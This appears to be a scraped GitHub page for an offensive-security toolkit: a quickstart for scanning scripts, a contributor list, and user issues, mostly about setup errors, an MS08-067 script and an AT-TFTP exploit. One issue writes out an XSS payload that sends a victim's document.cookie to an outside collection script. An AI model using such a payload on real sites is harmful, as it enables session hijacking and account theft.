jivoi / pentest Goto Github PK

:no_entry: offsec batteries included

Python 45.20% PHP 0.49% Shell 27.77% Ruby 0.32% Perl 1.30% C 1.06% Batchfile 4.39% HTML 12.38% PowerShell 2.30% Assembly 2.15% VBScript 0.04% ASP.NET 2.56% Raku 0.04%

pentesting kali-linux python pentesting-windows pentest-environment offensive-security

pentest's Introduction

So, You Want to be a Rock Star?

Follow instructions, it`s very easy!

$ git clone https://github.com/jivoi/pentest.git ./offsecfw && cd offsecfw
$ mix_ping_sweep.py 192.168.56.1-254 ./results
$ mix_port_scan.sh -t ./results/targets.txt -p all
$ mix_recon.py ./results/targets.txt

pentest's People

Contributors

Stargazers

Watchers

Forkers

firebitsbr faisal82 miauwuffmiau gnusecer 4sp1r3 a3rd slacksec dit81 xkostejx 3mrgnc3 tmcmil nasnaq witchfindertr thanatoskira jmswag ajmartel m00zh33 securitywarrior cyber-forensic jack51706 javarockstar furusiyya threatinteltest flyr4nk z3v2cicidi mel0day h1d3r n0maj1o24 evilhat fishso kernux qardeneden coffeehb m31n99 pe4ch xqx12 xiaoyanguoke yuansec starrkdevil 3rawkz kovidonat ismailbozkurt opexxx buckshotwhoami blueroutecn olivierh59500 vaginessa geonaute miquelt goffinet yikez978 ankushgoel27 he-who-is-him icanhasflag av1080p masterpentetser fb11 unix1010 q1f3 mrpentest mgcfish ll2b michael254 ellipsys ch4p34un0ir jxj0 pwapou vnhacker1337 houcy sha8e ioscarry pawmsf xee5ch hasanakgoz onlycjeg bhattsameer inudola peterpt securux offseccat calsaviour p3t3rp4rk3r kuteminh11 mrbug0x41 aniruddhmistry snypter valkirya lw1988 zhangymjlu cankuxiaomu 0xfa-team byrnesz nocv securitypilot dutchand hibouu saj82 jineeshak ecowen mrpwnd

pentest's Issues

XSS help

I'm doing an ethical hacking test, I tested an XSS payload : <script>alert("xss")</script> on a website, and the pop-up appears, so I want to collect user cookie

I created a getcookie.php file and a cookies.txt file and and I uploaded both files to a hosting server,
I placed the two files in the htdocs folder, which now contains index.html, getcookie.php and a cookies.txt

This is the getcookie.php file:

When I try this in the search box: : <script>document.location="http://website.com/getcookie.php?c="+document.cookie;</script>

I get this URL:
https://website2/search/?section=all&query=<script>document.location="http:SLASHSLASHwebsite.comSLASHgetcookie.php?c="+document.cookie;&path=SLASH

and I don't see any cookies in cookies.txt

What am I doing wrong, please? I've tried lot of payloads in the past 3 days but no results,
when I type http://website.com/getcookie.php in a new tab, I get the cookie but it's empty, I get this text : Cookie:

Thank you

MS08-067: Impacket and PyCrypto

I'm getting this error when I'm running your code:

Install the following library to make this script work
Impacket : http://oss.coresecurity.com/projects/impacket.html
PyCrypto : http://www.amk.ca/python/code/crypto.html

Before, it's working fine on my Kali. However, when I installed the latest Impacket (https://github.com/CoreSecurity/impacket), I started getting that error. Any way I could fix this? Thanks!

Python Files

All of the Python Files with underscore in the name will cause the terminal do this

File "/home/REDACTED/offsecfw/mix_ping_sweep.py", line 18
print "\nUsage: mix_ping_sweep.py \n"
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?

That why I'm manually renaming all of the .py files that have underscore in there name: mix_ping_sweep.py --> mix-ping-sweep.py
Hopefully That will fix the issue :)

ImportError: No module named reconf

When I run the python mix_recon.py script, I get the output:

Traceback (most recent call last):
File "mix_recon.py", line 22, in
import reconf
ImportError: No module named reconf

Can you tell me how I can correct this?

I tried "easy_install reconfg", but I'm still getting the same error.

Thanks

Blank Page on UDP port scan.

When attempting to perform any UDP scans, the page just stays blank? Any ideas?

Linux Server.

setup.py

Getting an error when I run setup.py

# ./enumeration/setup.py                                                                                                                                                  (master) 
[*] Installing missing NSE scripts...
Traceback (most recent call last):
  File "./enumeration/setup.py", line 58, in <module>
    nsescript = "%s/%s" % (reconf.nsepth, nsefile)
AttributeError: 'module' object has no attribute 'nsepth'

Install to the /root/ directory

Should include a note in the installation to clone this under the /root/ directory, since that path is hard coded into the port scan script. I had cloned this to my desktop and the port scan couldn't find the required files.

Invalid Syntax error

Hello,

When i try to execute the script, I get this error:

File "/home/kali/Downloads/Tool/pentest-master/mix_port_scan.sh", line 3
function usage {
^
SyntaxError: invalid syntax

Could you help me?

./setup.py error

Hello,

When running ./setup.py from /offsecfw/enumeration I get the following error

Traceback (most recent call last):
File "./setup.py", line 11, in
installed_packages = pip.get_installed_distributions()
AttributeError: 'module' object has no attribute 'get_installed_distributions'

There is no requirements.txt file to install.

Please advise?

Just one question

Hi,

I would like to ask you just one ,probably obvious, question about this exploit.
( sorry but I've experience in programming since a year but newbie in pentesting )
I've tried to read your article here ( http://netsec.ws/?p=262 ) and you said at the end this things:

Install AT-TFTP v1.9 on target machine. OK clear.
2.Disable any firewall. Ok clear.
3.Put metasploit listening.Ok clear.
4.Run the python script with the right arguments. Ok clear.

My question is:

to open the meterpreter session is necessary to run the AT-TFTP v1.9 exe file on target machine right?
I don't understand this thing.

Thx in advance.